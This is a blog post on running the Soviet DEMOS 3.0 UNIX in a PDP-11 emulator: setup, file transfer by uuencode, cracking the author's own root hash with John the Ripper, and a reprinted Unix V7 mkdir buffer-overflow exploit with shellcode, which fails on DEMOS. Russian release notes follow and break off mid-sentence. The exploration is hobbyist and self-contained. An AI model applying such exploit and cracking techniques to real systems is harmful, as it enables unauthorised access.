This is something that I think should be shared exactly now as the anti-russian craziness peaks once again. When the cold war between USA and USSR reached its climax in the early 1980’s, technological advantage was on the West side. Interestingly enough, the Soviet side wanted to keep up and through various ways managed to build its own 16bit microprocessors.

Soviets had their 1801 series CPU which was compatible with DEC’s PDP11. It was first released in 1980. And this CPU offered a first glimpse into the UNIX world.

https://en.wikipedia.org/wiki/DVK

First ever Soviet UNIX was called MNOS  Its development was initiated in the IPK Minavtoproma in Moscow in 1981, and development continued in cooperation from other institutes, including Kurchatov Institute.
In 1982 DEMOS development was initiated in the Kurchatov Institute of Atomic Energy in Moscow in 1982. The Kurchatov Institute was founded in 1943 with the initial purpose of developing nuclear weapons.

DEMOS(meaning “Dialogovaya Edinaya Mobilnaya Operatsionnaya Sistema” (Диалоговая Единая Мобильная Операционная Система, ДЕМОС)

So as a modern archaeologist lets get our hands on some DEMOS !

Get the DEMOS 3.0 images here : https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/vak-opensource/dvk-demos.zip
Actually the zip archive is hosted by Serei Vakulenko, one of the programmes of DEMOS.

The dvk-demos.zip archive contains the following files

-rw-r--r-- 1 user user 35 Apr 20 2011 demos.bat
-rw-r--r-- 1 user user 97 Apr 20 2011 demos.ini
-rwxr-xr-x 1 user user 32 Apr 20 2011 demos.sh
-rw-r--r-- 1 user user 20003840 Apr 20 2011 harddisk.img
-rwxr-xr-x 1 user user 414552 Apr 20 2011 pdp11
-rwxr-xr-x 1 user user 416768 Apr 20 2011 pdp11.exe
-rw-r--r-- 1 user user 323 Apr 20 2011 README.txt

We can safely delete the demos.bat , pdp11.exe files as the following instructions are for Debian based Linux.

The pdp11 binary is quite old and I would suggest to download a newer release 4.0 beta which contains the nice TELNET option to connect to the simh via telnet.

Get simh 4.0.beta from here (with dvk-dpd11 patch) : https://github.com/shattered/simh/tree/simh-dvk

git clone -b simh-dvk https://github.com/shattered/simh.git
cd simh
make pdp11
cp BIN/pdp11 /to/the-extraxted-demos-3.0/dir

Now the new pdp11 binary needs some modification of the original demos.ini

set LPT disable
set DZ disable
set cpu 11/23 256k cis idle
attach kmd0 floppy.img
attach kgd0 harddisk.img
set console telnet=4000
boot kgd0

The above config runs pdp11 listening on TCP port 4000, which can be accessed by your favourite telnet client, I have chosen putty.

# apt-get install putty

Now execute putty and point it to localhost : 4000 via telnet protocol

Run the demos.sh  (./pdp11 -i demos.ini)

./demos.sh
PDP-11 simulator V4.0-0 Beta git commit id: 1b97ab17
Listening on port 4000
Waiting for console Telnet connection

Connect with putty

Hit ENTER to boot the pdp11 and hit enter in all other options (time configuration – Hey this is not Y2K ready .. so we will go back into 1991)

Login as root  (no password set; just hit ENTER)

So now we are finally running DEMOS 3.0, what next ?

#Howto copy files from host to dvk-pdp11 DEMOS

– On host simply do

 $ tar cf floppy.img somefile.c

– Attach floppy.img in demos.ini

attach kmd0 floppy.img

– Once DEMOS is booted do

SUPER>  tar xf /dev/fd0

#Howto copy files from dvk-pdp11 to host?
for some reason the gnu tar does not like tarballs made on DEMOS
I could not get the following to work

– On dvk-pdp11

 SUPER > tar cf /dev/fd0 /usr/bin/somefile

(this works)
On the host

$ tar xvf floppy.img
tar: Removing leading `/' from member names
/usr/bin/somefile
tar: A lone zero block at 42

GNU Tar has problems with the dsk-pdp11 DEMOS tarballs. So I decided to upload an ancient uuencode.c to the host via the floppy.img method
In our example we will upload uuencode.c and compile it

/*
 * Copyright (c) 1983 Regents of the University of California.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms are permitted
 * provided that the above copyright notice and this paragraph are
 * duplicated in all such forms and that any documentation,
 * advertising materials, and other materials related to such
 * distribution and use acknowledge that the software was developed
 * by the University of California, Berkeley.  The name of the
 * University may not be used to endorse or promote products derived
 * from this software without specific prior written permission.
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
 * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
 */

/*
 * Modified 12 April 1990 by Mark Adler for use on MSDOS systems with
 * Microsoft C and Turbo C.  Standard input problem fixed 29 April 1990
 * as per suggestion by Steve Harrold.
 *
 * Modifed 13 February 1991 by Greg Roelofs for use on VMS systems.
 * Compile and link normally (but note that the shared-image link option
 * produces a binary only 6 blocks long, as opposed to the 152-block one
 * produced by an ordinary link).  To set up the VMS symbol to run the
 * program ("run uuencode filename1 filename2 filename3" won't work), do:
 *        uuencode :== "$disk:[directory]uuencode.exe"
 * and don't forget the leading "$" or it still won't work.  The syntax
 * differs slightly from the Unix and MS-DOS versions since VMS has such
 * an awkward approach to redirection; run the program with no arguments
 * for the usage (or see USAGE below).  The output file is in VMS "stream-
 * LF" format but should be readable by MAIL, ftp, or anything else.
 */

#ifndef lint
static char sccsid[] = "@(#)uuencode.c    5.6 (Berkeley) 7/6/88";
#endif /* not lint */

#ifdef __MSDOS__        /* For Turbo C */
#define MSDOS 1
#endif

/*
 * uuencode [input] output
 *
 * Encode a file so it can be mailed to a remote system.
 */
#include <stdio.h>

#ifdef VMS
#  define OUT out    /* force user to specify output file */
#  define NUM_ARGS 3
#  define USAGE "Usage: uuencode [infile] remotefile uufile\n"
#  include <types.h>
#  include <stat.h>
#else
#  define OUT stdout    /* Unix, MS-DOS:  anybody with decent redirection */
#  define NUM_ARGS 2
#  define USAGE "Usage: uuencode [infile] remotefile\n"
#  include <sys/types.h>
#  include <sys/stat.h>
#endif

#if MSDOS
#include <io.h>
#include <fcntl.h>
#endif

/* ENC is the basic 1-character encoding function to make a char printing */
#define ENC(c) ((c) ? ((c) & 077) + ' ': '`')

main(argc, argv)
char **argv;
{
#ifdef VMS
    FILE *out;
#endif
    FILE *in;
    struct stat sbuf;
    int mode;

    /* optional 1st argument */
    if (argc > NUM_ARGS) {
        if ((in = fopen(argv[1], "r")) == NULL) {
            perror(argv[1]);
            exit(1);
        }
        argv++; argc--;
    } else
        in = stdin;

#if MSDOS
    /* set input file mode to binary for MSDOS systems */
    setmode(fileno(in), O_BINARY);
#endif

    if (argc != NUM_ARGS) {
        fprintf(stderr, USAGE);
        exit(2);
    }

#ifdef VMS   /* mandatory 3rd argument is name of uuencoded file */
    if ((out = fopen(argv[2], "w")) == NULL) {
        perror(argv[2]);
        exit(4);
    }
#endif

    /* figure out the input file mode */
    if (fstat(fileno(in), &sbuf) < 0 || !isatty(fileno(in)))
        mode = 0666 & ~umask(0666);
    else
        mode = sbuf.st_mode & 0777;
    fprintf(OUT, "begin %o %s\n", mode, argv[1]);

    encode(in, OUT);

    fprintf(OUT, "end\n");
    exit(0);
}

/*
 * copy from in to out, encoding as you go along.
 */
encode(in, out)
register FILE *in;
register FILE *out;
{
    char buf[80];
    register int i, n;

    for (;;) {
        /* 1 (up to) 45 character line */
        n = fread(buf, 1, 45, in);
        putc(ENC(n), out);

        for (i=0; i<n; i += 3)
            outdec(&buf[i], out);

        putc('\n', out);
        if (n <= 0)
            break;
    }
}

/*
 * output one group of 3 bytes, pointed at by p, on file f.
 */
outdec(p, f)
register char *p;
register FILE *f;
{
    register int c1, c2, c3, c4;

    c1 = *p >> 2;
    c2 = (*p << 4) & 060 | (p[1] >> 4) & 017;
    c3 = (p[1] << 2) & 074 | (p[2] >> 6) & 03;
    c4 = p[2] & 077;
    putc(ENC(c1), f);
    putc(ENC(c2), f);
    putc(ENC(c3), f);
    putc(ENC(c4), f);
}

Save the above as uuencode.c and tar it to floppy.img so we can transfer it to the dsk-pdp11

 tar cf floppy.img uuencode.c

On the dvk-pdp11 DEMOS

SUPER > goto some directory where you want to extract uuencode.c from floppy
SUPER > tar xf /dev/fd0
SUPER > cc uuencode.c -o uuencode

Now we are ready to uuencode binary files :)

SUPER > ./uuencode /path/to/binary binaryname

Copy  the text output in the Telnet console
Paste the text output to host and save as file.txt

On debian you need the sharutils

# apt-get install sharutils
$ uudecode file.txt

You should have the binary file in the path

$ file binariname
binaryname: PDP-11 executable

Now lets check what password hashing ciphers were used by Soviets back then. Set your root password via passwd command.

SUPER 74> cat /etc/passwd
 root:vQwdXj/6D.J2M:0:2:Суперпользователь (The God):/:/bin/csh
 daemon:***:1:1:Дьявол во плоти:/:
 sys:***:2:2::/:
 bin:***:3:2::/:
 uucp::4:1:Сеть UUCP:/usr/spool/uucppublic:/usr/lib/uucp/uucico
 notes:***:5:1:Создатель Notesfiles:/usr/spool/notes:
 anon:***:6:1:Анонимный пользователь Notesfiles:/usr/spool/notes:
 news:***:7:1:Создатель новостей:/usr/spool/news:
 bugs:***:8:1:Адресат для сообщений об ошибках:/usr/spool/mail:/usr/bin/mail
 rubin:***:100:2:суперпользователь СУБД РУБИН:/usr/rubin:/bin/csh
 user::101:1:Пользователь:/usr/user:/usr/bin/vs

• Copy paste the above passwd file and save it on the host as dkv-pdp11-passwd file
• Install John the Ripper

# apt-get install john

• Create a wordlist file with the password we have set in dvk-pdp11 DEMOS
  and add multiple variations to the password to verify the cipher on DEMOS

$ john --wordlist=wordlist dvk-pdp11-passwd
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
p4ssw0rd         (root)
1g 0:00:00:00 100% 5.263g/s 78.94p/s 78.94c/s 78.94C/s passw0rd..p4ssw0rd
Use the "--show" option to display all of the cracked passwords reliably
Session completed

It works, we have cracked a Soviet DEMOS root password :)

Now lets dump the kernel :

SUPER > ./uuencode /demos demos

– copy the ASCII
– paste the ASCII to host demos.txt

$ uudecode demos.txt

On DEMOS

SUPER 27> ls -la /demos
-rwxrwxr-x 1 root     superuse   81188 сен 10 17:59 /demos
SUPER 28> file /demos
/demos: overlaid pure executable not stripped

On Debian :

user@X201:~/UNIX/dvk-demos > file demos
demos: PDP-11 overlaid pure executable not stripped

So now we have a binary kernel for further analysis

Lets try some ancient exploits !

UNIX 7th Edition /bin/mkdir – Local Buffer Overflow
http://www.exploit-db.com/exploits/302/

/*
 * Exploit for /bin/mkdir Unix V7 PDP-11.
 * mkdir has a buffer overflow when checking if the directory
 * in /arg/with/slashes/fname exists.
 *
 * This will run /bin/sh with euid 0, but not uid 0.  Since
 * the shell doesn't do anything special about this, we don't
 * really care.  If you care, run  setuid(0); execl("/bin/sh", 0);
 */

/*
 .globl  _main
 _main:
 mov  pc,r1
 sub  $-[sh-_main-2], r1             / pointer to sh
 mov  r1, r2
 sub  $-8, r2
 clrb -1(r2)                         / null terminate
 mov  r1, r2
 clr  -(r1)                          / char *env[] = {0}
 mov  r1, r3
 mov  r2, -(r1)                      / char *argv[] = {sh, 0}
 mov  r1, r4
 mov  r3, -(r1)                      / reverse of sh,argv,env
 mov  r4, -(r1)
 mov  r2, -(r1)
 sys  59.; 11111; 11111; 11111       / call execve
 argv:   11111; 11111
 sh:     </bin/sh>
 */

char egg[] = { 0301, 021, 0301, 0345, 0326, 0377, 0102, 020,
 0302, 0345, 0370, 0377, 062, 0212, 0377, 0377,
 0102, 020, 041, 012, 0103, 020, 0241, 020,
 0104, 020, 0341, 020, 041, 021, 0241, 020,
 073, 0211, 0111, 022, 0111, 022, 0111, 022,
 0111, 022, 0111, 022, 057, 0142, 0151, 0156,
 057, 0163, 0150, 0 };

#define NOPSLIDE 50
 #define CNT 136
 #define PC 0xfea0

main(argc, argv)
 int argc;
 char **argv;
 {
 char buf[400];
 int i;
 char *argv2[4];

/* nop slide + egg */
 for(i = 0; i < NOPSLIDE; ) {
 buf[i++] = 0301;
 buf[i++] = 021;
 }
 strcpy(buf + i, egg);

/* pad out to CNT */
 for(i = strlen(buf); i < CNT; i++)
 buf[i] = 'a';

/* overwrite retaddr */
 buf[i++] = PC & 0xff;
 buf[i++] = PC >> 8;

/* extra stuff */
 buf[i++] = '/';
 buf[i++] = 'a';
 buf[i++] = 0;

argv2[0] = "/bin/mkdir";
 argv2[1] = buf;
 argv2[2] = 0;
 execv(argv2[0], argv2);
 return 0;
 }

Before we run this exercise we need to modifiy /etc/passwd
so that the default shell for the user is changed to /bin/csh.  DEMOS on dvdk-pdp11 has the ancient ed editor which is quite cryptic to learn today … So how do we edit /etc/passwd ? There are a few options, first is to simply use cat

so first on dvd-pdp11 DEMOS do :

SUPER > cat /etc/passwd

– Copy the output
– On host paste the output to a file passwd.txt
– Edit with your favourite editor and change the user shell (remove the Cyrillics  from account description;)

$ cat passwd.txt

– Copy the output

SUPER > mv /etc/passwd /etc/passwd.old
SUPER > cat <<EOF> /etc/passwd
root:vQwdXj/6D.J2M:0:2:Superuser (The God):/:/bin/csh
daemon:***:1:1:Deamon:/:
sys:***:2:2::/:
bin:***:3:2::/:
uucp::4:1:Network UUCP:/usr/spool/uucppublic:/usr/lib/uucp/uucico
notes:***:5:1:Notes Notesfiles:/usr/spool/notes:
anon:***:6:1:anonymouns Notesfiles:/usr/spool/notes:
news:***:7:1:News:/usr/spool/news:
bugs:***:8:1:Bugs:/usr/spool/mail:/usr/bin/mail
rubin:***:100:2:RUBIN DB User:/usr/rubin:/bin/csh
user:CRdA8QWcCutMQ:101:1:User:/usr/user:/bin/csh
EOF

– Here we have the following (crypt) hashed password :
p4ssw0rd for root and password for user

Also lets modify the /etc/group so it reflects our user !

 SUPER > cat /etc/group

– Copy the output
– On host paste the output to a file group.txt
– Edit with your favourite editor and add user to users group

$ cat group.txt
SUPER > mv /etc/group /etc/group.old
SUPER > cat <<EOF> /etc/group
superuser:***:0:root
daemon::1:daemon,avg,dmitry
sys::2:bin,sys,yst,root
bin::3:bin,sys,avg,alex
uucp:***:4:uucp
users:***:10:sviridov,flerov,guba,polina,lena,tasha,guest,test,user
EOF

I wonder who Polina, Lena and Tasha were …
If they are still around I send my regards !

– Now exit from SUPER > shell
CTRL+D
– Login as user

user > pwd
/usr/user
user > cat <<EOF> /usr/user/exploit.c
char egg[] = { 0301, 021, 0301, 0345, 0326, 0377, 0102, 020,
0302, 0345, 0370, 0377, 062, 0212, 0377, 0377,
0102, 020, 041, 012, 0103, 020, 0241, 020,
0104, 020, 0341, 020, 041, 021, 0241, 020,
073, 0211, 0111, 022, 0111, 022, 0111, 022,
0111, 022, 0111, 022, 057, 0142, 0151, 0156,
057, 0163, 0150, 0 };

#define NOPSLIDE 50
#define CNT 136
#define PC 0xfea0

main(argc, argv)
int argc;
char **argv;
{
char buf[400];
int i;
char *argv2[4];

/* nop slide + egg */
for(i = 0; i < NOPSLIDE; ) {
buf[i++] = 0301;
buf[i++] = 021;
}
strcpy(buf + i, egg);

/* pad out to CNT */
for(i = strlen(buf); i < CNT; i++)
buf[i] = 'a';

/* overwrite retaddr */
buf[i++] = PC & 0xff;
buf[i++] = PC >> 8;

/* extra stuff */
buf[i++] = '/';
buf[i++] = 'a';
buf[i++] = 0;

argv2[0] = "/bin/mkdir";
argv2[1] = buf;
argv2[2] = 0;
execv(argv2[0], argv2);
return 0;
}
EOF

user > cc exploit.c -o /usr/user/exploit
user > ./exploit
mkdir: cannot access аааааааааааааааааааааааааааЕжЪBбЕЬЪ2
ЪЪB!
C!DА!!; IIIII/bin/shaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Ч/.
Наруш. защиты памяти
user >
user > mkdir /etc/test
mkdir: cannot access /etc/.

So exploit does not work on DEMOS …
No coredump under standard user privileges
Lets try via root if we can get a coredump

user >
CTRL+D
login as root
SUPER > cd /usr/user
SUPER > ./exploit
mkdir: cannot access аааааааааааааааааааааааааааЕжЪBбЕЬЪ2
ЪЪB!
C!DА!!; IIIII/bin/shaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Ч/.
Наруш. защиты памяти (память дампирована)

– Hey we got a coredump

SUPER > ls -la core
5 -rw-rw-r-- 1 root     sys         4160 сен 11 16:38 core

– Now uuencode the core file so we can check it on Linux

SUPER > /path/to/uuencode /usr/user/core core

– Copy the ASCII output
– Paste the ASCII output and save it on host as core.txt

$ uudecode core.txt
$ strings core
core
core
mkdir
Af~f~
aaaaaa
mkdir: arg count
mkdir: cannot access %aa
mkdir: cannot make directory %s
mkdir: cannot link %s
mkdir: cannot link %s
(null)
kdir: cannot access
/bin/shaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
/bin/mkdir
/bin/shaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
HOME=/
PATH=/:/bin:.:/usr/bin:/etc:/usr/ucb
TERM=ccgd
SHELL=/bin/csh
USER=root
MSG=r
TAPE=/dev/fd0

Lets do some ancient exploit code debugging !

Last the RELEASE notes in Russian for this particular version of DEMOS

1. НАСТРОЙКА ОПЕРАЦИОННОЙ СИСТЕМЫ ДЕМОС
====================================

В разделе описываются процедуры, которые необходимо вы-
полнять, как при первичной установке системы, так и в случае
“полного разрушения” корневой файловой  системы  или  замены
жесткого  диска; описывается корневая файловая система и не-
которые справочники.

Процесс подготовки системы к эксплуатации можно  разде-
лить на следующие этапы:
– первичная установка (или  восстановление)  системы  с
дистрибутивного набора гибких магнитных дисков (ГМД);
– загрузка системы и проверка ее целостности;
– настройка системных файлов.
При “частичном разрушении” файловых  систем  рекоменду-
ется  попытаться восстановить их целостность программой fsck
(см. приложение 2).

1.1. Первичная установка системы
===========================
Для первичной установки системы необходимо:
– тумблером “СЕТЬ” включить ПЭВМ;
– вставить дискету с номером 0  (стартовую  дискету)  в
верхнее устройство (нулевое);
– получив приглашение “@”, нажать клавишу <B>, и  затем
в ответ на приглашение “$” (доллар) ввести “MY0” (или “MY” и
нажать клавишу <ВК>);
– через некоторое время на экран будет выдано приглаше-
ние  “BOOT:…”;  в  ответ на него необходимо нажать клавишу
<ВК>;
– на запрос “установка ДЕМОС требует стирания  информа-
ции на жестком диске…” необходимо ответить “Y” (YES) и на-
жать клавишу <ВК>; отменить неправильно введенный символ (до
нажатия клавиши <ВК>) можно при помощи клавиши <ЗБ>;
– на запрос “Введите  время…”  необходимо  ввести  10
цифр  и  нажать клавишу <ВК>; время задается следующим обра-
зом:
ггммддччмм,
где  гг – две последние цифры номера года (например, 90);
мм – номер месяца (от 01 до 12);
дд – номер дня в месяце;
чч – час (от 00 до 23);
мм – минуты (от 00 до 59);
– на запрос “Емкость накопителя  на  жестком  диске…”
необходимо  ввести  цифру  –  номер типа накопителя и нажать
клавишу <ВК>; тип накопителя задается следующим образом:

1.  5 Мб  153 цилиндра  /0-152/ – установка СУБД “РУБИН” невозможна
2. 10 Мб  306 цилиндров /0-305/ – установка СУБД “РУБИН” невозможна
3. 10 Мб  306 цилиндров /0-305/ – установка СУБД “РУБИН” возможна
4. 20 Мб  612 цилиндров /0-611/ – установка СУБД “РУБИН” возможна

– далее на запрос “Форматировать жесткий диск?” необ-
ходимо ввести “Y”, если требуется отформатировать диск, либо
ввести “N”, если не требуется;
– после загрузки минисистемы на жесткий диск будет  вы-
дано  сообщение о необходимости ее перевызова с этого диска;
через некоторое время будет выдано приглашение “@”;
– в ответ на это приглашение необходимо набрать “B”,  а
затем  в ответ на приглашение “$” (доллар) ввести “DW0” (или
“DW” и нажать клавишу <ВК>);
– через некоторое время на экран будет выдано приглаше-
ние  “BOOT:…”;  в  ответ на него необходимо нажать клавишу
<ВК>;
– после того, как система будет вызвана, она запросит дискету N1 из
базового набора; ее необходимо вставить в любой накопитель
на гибких  дисках, ввести номер накопителя и нажать
клавишу <ВК>;
– после считывания дискеты система запросит  следующую;
необходимо вынуть дискету с номером 1 из накопителя
и вставить дискету с номером 2, затем с номером 3 и
так далее;
– после того, как будут прочитаны все дискеты  базового
набора, система автоматически перезагрузится и проверит фай-
ловую систему на жестком диске  (при  этом  может  произойти
повторная перезагрузка);
– после перезагрузки система выдаст приглашение “Имя:”;
необходимо  ввести имя суперпользователя root для выполнения
административных функций в системе ДЕМОС.

Если вход в систему выполнен первый раз после  первона-
чальной  установки системы или полного восстановления, необ-
ходимо проделать следующее:
– установить  пароль  для  пользователя  root  командой
passwd;
– продублировать дистрибутивный набор ГМД.

Для копирования дискет можно использовать команду  cpfd
(см. 4.6.2).
Перед выключением ПЭВМ  пользователь  должен  выполнить
команду:
/etc/reboot -h ( Обязательно !!! )

На дискетах дистрибутивного набора должны быть наклеены
маркеры  защиты записи. Это необходимо для того, чтобы из-за
неисправности аппаратуры или неосторожного использования  не
разрушить информацию на дискетах.
Во время загрузки с дискеты с номером 0, она
должна быть без маркера.

1.2. Загрузка и проверка целостности системы
=======================================
Для загрузки операционной системы ДЕМОС необходимо:
– включить питание ПЭВМ;
– получив приглашение “@”, нажать клавишу <B>, и  затем
в ответ на приглашение “$” (доллар) ввести “DW0” (или “DW” и
нажать клавишу <ВК>);
– через некоторое время на экран будет выдано приглаше-
ние  “BOOT:…”;  в  ответ на него необходимо нажать клавишу
<ВК>;
– на запрос “Введите время …”  необходимо  ввести  10
цифр и нажать клавишу <ВК>;
– далее на запрос “Проверять файловые системы?” необхо-
димо  нажать клавишу <ВК> (если требуется проверять файловые
системы) или ввести “N” и нажать клавишу <ВК> (если не  тре-
буется проверять файловые системы);
– после проверки файловых систем будет выдано приглаше-
ние  “Имя:”; необходимо ввести имя, под которым пользователь
зарегистрирован в системе; после его обработки  осуществится
вход в систему.

П р и м е ч а н и е. Во время проверки файловых  систем
может произойти повторная перезагрузка.

Если в ответ на запрос “Имя:” ввести “user”,  то  прои-
зойдет  вход  в  систему ПРАКТИКА (описание системы ПРАКТИКА
см. разд.3 “Справочного руководства”).

После завершения работы в системе необходимо на пригла-
шение для ввода команд набрать “/etc/reboot -h”; после того,
как система ответит “SYNCING DISKS … DONE”,  можно  выклю-
чить питание ПЭВМ.

2. РАСШИРЕННЫЕ ВОЗМОЖНОСТИ ОС ДЕМОС ВЕРСИИ 3.0
===========================================
1.
Генерация ядра demos содержит следущие изменения в
сторону повышенной оптимальности и эффективности работы ядра:

a). Создан новый, максимально быстрый и очень расторопный
в работе драйвер жесткого диска типа “Винчестер”, ре-
жимы  работы которого настраиваются программой rwset.

b). Откорректирован и оптимизирован драйвер гибкого
диска.

c). Создан новый суперуниверсальный драйвер принтера,
поддерживающий работу печатающих устройств типа:
EPSON FX-800, EPSON LX-800, СМ 6302, DZM-180, СМ 6315,
СМ 6900, ROBOTRON СМ 6329, D100, D100M, и т.д.
в полном объеме их функциональных возможностей
и с учетом ошибок в ПЗУ EPSON FX-800. Режимы работы
драйвера настраивается программой lpset.
Подробнее см. файл READ_LP в корневом каталоге.

d). Данная версия ядра поддерживает работу контроллера КЦГД
как с ПЗУ КР18101РЕ2-181 на плате КЦГД, так и с ПЗУ
КР18101РЕ2-182, работающей в 8-битном символьном режиме.
(Следует заметить, что ядро версии 2.0 не способно рабо-
тать с КЦГД на ПЗУ КР18101РЕ2-182). Однако, поставляемый
графический протокол /etc/graf,загружаемый в ОЗУ КЦГД
и разработанный для ПЗУ КР18101РЕ2-181, не будет за-
гружаться при ПЗУ КР18101РЕ2-182. В настоящее время
разрабатывается новый графический протокол для
последней ПЗУ.

В целях экономии памяти изменены параметры
конфигурации ядра:

e). Количество буферов ввода/вывода.

f). Количество процессов в системе.

g). Количество одновременно исполняемых программ.

h). Количество описателей файлов.

i). Количество одновременно открытых файлов.

j). “Зажата” статистика по буферам ввода/вывода, по под-
качке, по загрузке системы, по командам.

k). Уменьшено количество оверлеев ядра demos.

l). И другие мелочи…

2.
Устранены ошибки в загрузчике boot, что позволило
работать на разных типах жестких дисков.

3.
Устранены ошибки в промежуточных загрузчиках
rwuboot, fduboot.

4.
Новая версия 4.1 полиэкранного редактора red
содержит следующие изменения и дополнения:

a). <ПФ1><i><ВК> установка/сброс режима вставки.

b). <ПФ1><b><ВК> установка режима 132 символа на экране.

c). <ПФ1><l><ВК> установка режима 80 символов на экране.

d). <ПФ1><g><ВК> установка режима прорисовки символов
псевдографики. С помощью клавиш <Ф4>,<Ф5>,<Ф6>,<Ф8>
можно “рисовать” и “стирать” вертикальные и горизон-
тальные сплошные линии.

e). <ПФ1><Ф0> установка/сброс режима рисования/стирания псевдографики.

f). <ПФ1><n><ВК> выход из режима псевдографики.

g). <Ф1>   перемещение курсора по словам вперед.

h). <ПФ4> перемещение курсора по концам строк.

i). <Ф5>   удаление слова справа от курсора.

j). <ПФ1><Ф2><стрелка вправо> перемещение курсора
в правую крайнюю позицию текущего окна.

k). <ПФ1><Ф2><стрелка влево> перемещение курсора
в левую крайнюю позицию текущего окна.

l). <ПФ1><Ф2><стрелка вверх> перемещение курсора
в верхнюю крайнюю позицию текущего окна.

m). <ПФ1><Ф2><стрелка вниз> перемещение курсора
в нижнюю крайнюю позицию текущего окна.

n). <ПФ1><восьмеричное число><Ф2><Ф0> ввод спец. символов,
где число состоит из трех цифр.

о). Оптимизирован вывод информации на экран при
использовании клавиш <Ф7>, <ПФ1><Ф7>, <Ф2><Ф7>, <ПФ1><Ф2><Ф7>

p). Отменено действие клавиши <Ф.>, как табуляции назад

5.
Откорректирована программа graf (файл etc/graf).
Графический протокол теперь можно загружать как
в режиме совместимости ( VT52 ), так и в расширен-
ном режиме ( VT100 ) дисплея.В файл etc/termcap вклю-
чена esc-последовательность установки зоны рулона со 2
по 22 строки экрана, что улучшает наглядность ра-
боты редактора red и другие незначительные изменения.

6.
Сделана удобная начальная установка ОС ДЕМОС на жесткий диск
(см. выше п.1) с учетом разных их типов и СУБД “РУБИН”.

7.
Внесены небольшие изменения в стартовый файл etc/rc
( связанные с программами fsck, mount ).

8.
Графическая библиотека libgraph.a находится в
каталоге usr/lib и является функциональным аналогом графи-
ческой библиотеки фирмы “Borland International”. В файле
READ_GRAF содержится описание графических функций.

*  *  *  *  *

9.
Программа opint определяет оптимальный интерливинг по сек-
торам,поверхностям,цилиндрам и форматирует винчестер.Контроль-
ное тестирование после форматирования винчестера с оптимальным
интерливингом показало,что эффективность работы с винчестером
возросла в среднем на 25-30%.Программа opint должна запускаться
с дискетты ( ОС загружается при этом также с дискетты под номе-
ром 0 ).Программа opint имеет следущие ключи:

Usage: opint {-i[N] | -f [-q] [-bN] [-lN] [-sN] [-cN]} [-r]

-i[N]  вычислить оптимальный фактор интерливинга по
секторам/поверхностям/ и по цилиндрам. N-номер
рабочего цилиндра, используется также цилиндр N-1
( по умолчанию N==152 )

-f  форматировать винчестер

-r  не сохранять информацию на винчестере (на нефор-
матированном винчестере этот ключ обязателен !!!)

-q  без вопросов

-bN  установить начало форматирования с N-го цилиндра
включительно (по умолчанию с цилиндра N==0),
этот цилиндр (а также предыдущий) используется в
качестве рабочего для поиска оптимального интерли-
винга, если используется ключ -b0 или таковой отсут-
ствует вообще, то рабочим становится 152 цилиндр.

-lN  установить конец форматирования до N-го цилиндра
включительно (по умолчанию до цилиндра N==152)

-sN  установить фактор интерливинга N по секторам/по-
верхностям/ (по умолчанию N==оптимальный)

-cN  установить фактор интерливинга N по цилиндрам
(по умолчанию N==оптимальный)

10.
Программа rwset служит для настройки режимов работы
драйвера жесткого диска и имеет ключи:

Usage: rwset [-cN] [[-]w]
-cN – включить предкомпенсацию с N-го цилиндра
w – включить проверку записи
-w – выключить проверку записи

11.
Программа lpset служит для настройки режимов работы
драйвера печатающего устройства. Вся инфорамация по печати
содержится в файле READ_LP.

* * * * * * *

3. ОПЕРАЦИОННАЯ СИСТЕМА ДЕМОС/306
==============================

Операционная система ДЕМОС/306 предназначена для установки и
функционирования на одном жестком диске (“Винчестер”, 20Мб) с
операционной системой RT-11. Жесткий диск емкостью 20Мб
между двумя ОС распределяется следующим образом :

RT-11 : с   0 по 305 цилиндр (10Мб)
ДЕМОС : с 306 по 611 цилиндр (10Мб)

Первоначально (по включению питания) происходит загрузка ОС RT-11,
причем драйвер жесткого диска должен быть настроен на работу с
10 Мб дискового пространства (по 305 цилиндр включительно).
После загрузки RT-11 ОС ДЕМОС/306 вызывается командой DEMOS.

Начальная  установка ОС ДЕМОС/306 от установки ОС ДЕМОС отличается
всего лишь одной установочной дискетой N0; остальные пять дискет
дистрибутива N1-N5 идентичны для обеих ОС.

Пользователь, уставший от двухколесного самоката RT-11
нажатием пяти клавиш пересаживается в стратегический
бомбардировщик DEMOS/306 !

ОС ДЕМОС/306 – ЭТО ПРОРЫВ В БУДУЩЕЕ !
ОС ДЕМОС/306 – ЭТО ПРОСТО ФАНТАСТИКА !

POSTCRYPTUM 1.
————– В каталоге /TEST содержатся контольно-демонстра-
ционные задачи и тесты, которые запускаются ко-
мандой /TEST/main.

POSTCRYPTUM 2.
————– В поставляемом дистрибутиве в каталогах bin/,
usr/bin/, etc/ содержатся утилиты и файлы
(в частности:

c7t10    nroff      autoconfig  termcap
chgrp    pp         clri        timstat
chown    pstat      cron        ttys
dump     restor     dostat      utpm
dumpdir  rline      getty       wall
edit     rmail      graf
egrep    setcolor   group
false    smbl       group.std
fgrep    startcode  init
gets     starttext  iostat
login    su         lp_daemon
lpf      tfd0       mknod
lpset    wermit     psdatabase
lx       accton     savecore
mix      admclean   shutdown

и другие…), на которые нет описаний в докумен-
тации, т.к. описания на утилиты и файлы, необхо-
димые администратору системы или системному програм-
мисту и не связанные непосредственно с работой поль-
зователя выходят за рамки данной документации, имею-
щей цель дать самые необходимые сведения для пользо-
вателя. Описания можно найти в различной литературе
по ОС UNIX т.к. большинство утилит и служебных
файлов имеют общепринятые в семействе ОС UNIX имена.
С другой стороны, не все утилиты ( в частности:

ardos     from      mkmf      splineg
banner    hier      mm        strings
blank     hostname  prmail    sum
checkobj  ident     rab       unifdef
ckdir     indent    rcs       units
colcrt    install   rcsdiff   uptime
ctags     last      rcsintro  uucpc
cxref     lastcomm  rcsmerge  uuxc
ddutok    lex       rev       whoami
error     lint      rlog      badsect
expand    look      script    ncheck
fold      merge     spell

и другие… ), описанные в документации, содержатся
в дистрибутиве, т.к. документация составлялась с
